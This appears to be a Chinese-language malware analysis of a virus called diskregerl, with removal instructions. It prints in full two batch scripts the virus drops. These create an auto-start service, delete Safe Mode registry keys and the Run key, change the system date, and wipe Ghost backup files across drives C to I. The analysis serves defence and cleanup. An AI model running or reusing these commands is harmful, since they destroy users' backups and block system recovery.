行爲分析:
1、拷貝文件:
C:\windows\system32\diskregerl.exe 45,056 字節
2、無添加啓動項舉動。
3、釋放2個批處理:
內容分別爲:
22483
17213
25187
6133
22690
25373
date 2004-08-17
19477
time 20:00:00
ping 127.0.0.1 -n 5
sc.exe create diskregerl BinPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= diskregerl Programnot
sc.exe description diskregerl 創建網絡連接2
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
23413
sc.exe start diskregerl
del "C:\WINDOWS\Media\Windows XP 開始.wav"
del "C:\WINDOWS\Media\Windows XP 信息欄.wav"
del "C:\WINDOWS\Media\Windows XP 彈出窗口已阻止.wav"
regsvr32.exe /s C:\windows\system32\Programnot.dll
ping 127.0.0.1 -n 6
del "C:\Documents and Settings\孤獨更可靠\桌面\oky.exe" /F
22483
17213
date 2008-04-02
time 08:21:33
del %0
exit
第二個:
25187
6133
226902537319477
2819720092
404
ping 127.0.0.1 -n 16
13539
cmd.exe /c del /f /s /q c:*.gho
6752
cmd.exe /c del /f /s /q d:*.gho
31772
cmd.exe /c del /f /s /q e:*.gho
12028
cmd.exe /c del /f /s /q f:*.gho
8720
cmd.exe /c del /f /s /q g:*.gho
10731
cmd.exe /c del /f /s /q h:*.gho
8840
cmd.exe /c del /f /s /q i:*.gho
11736
regsvr32.exe /s C:\windows\system32\Programnot.dll
del %0
exit
4、連接網站,刷流量:
http://www.xerty.cn/^^/300center.htm
5、另外該病毒可能惡意鎖定IE主頁,不過未實現。
解決方法:
1、重啓計算機。
2、刪除文件:
C:\windows\system32\diskregerl.exe
3、如果重啓後病毒無法刪除,請下載冰刃(該軟件可到down.45it.com下載),結束其進程。
